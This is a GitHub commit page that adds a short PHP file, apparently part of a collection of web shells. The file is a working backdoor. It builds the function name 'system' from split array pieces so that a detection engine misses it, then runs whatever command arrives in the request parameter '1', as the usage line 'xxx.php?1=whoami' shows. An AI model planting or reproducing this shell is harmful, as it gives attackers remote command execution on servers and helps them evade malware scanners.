Create system2022-08-22-4.php

from: https://zhuanlan.zhihu.com/p/550150061
usage: xxx.php?1=whoami
This commit is contained in:
tennc 2022-08-22 22:42:23 +08:00 committed by GitHub
parent a5b681ccf8
commit 43c3fd24a3
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -0,0 +1,6 @@
<?php
//ASRC伏魔引擎bypass
$result = array_diff(["s","a","b","ys","te","m"],["a","b"]);
$a = join($result);
array_map($a,(array)$_REQUEST['1']);
?>